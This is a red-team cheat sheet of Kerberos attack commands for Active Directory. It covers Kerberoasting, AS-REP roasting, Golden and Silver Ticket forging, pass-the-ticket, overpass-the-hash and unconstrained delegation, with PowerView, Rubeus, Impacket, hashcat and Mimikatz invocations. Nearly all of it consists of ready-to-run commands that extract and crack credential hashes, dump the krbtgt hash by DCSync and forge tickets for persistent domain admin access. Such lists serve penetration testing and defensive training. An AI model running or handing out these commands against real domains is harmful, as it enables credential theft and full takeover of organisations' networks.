🎫 Kerberos Attacks
Kerberoasting
Request service tickets for SPN accounts, crack offline
PS> Get-DomainUser -SPN
PS> Invoke-Kerberoast -OutputFormat Hashcat
PS> Rubeus.exe kerberoast /outfile:hashes.txt
$ GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.10.10 -request
$ hashcat -m 13100 hashes.txt wordlist.txt
AS-REP Roasting
Attack users with "Do not require Kerberos preauthentication"
PS> Get-DomainUser -PreauthNotRequired
PS> Rubeus.exe asreproast /format:hashcat
$ GetNPUsers.py domain.local/ -usersfile users.txt
$ hashcat -m 18200 hashes.txt wordlist.txt
Golden Ticket
Requires krbtgt hash - provides persistent DA access
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /ptt"'
Silver Ticket
PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:HASH /ptt"'
Pass-the-Ticket
PS> Rubeus.exe ptt /ticket:ticket.kirbi
$ export KRB5CCNAME=ticket.ccache
Overpass-the-Hash
PS> Rubeus.exe asktgt /user:admin /rc4:HASH /ptt
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:HASH"'
Unconstrained Delegation
PS> Get-DomainComputer -Unconstrained
PS> Rubeus.exe monitor /interval:5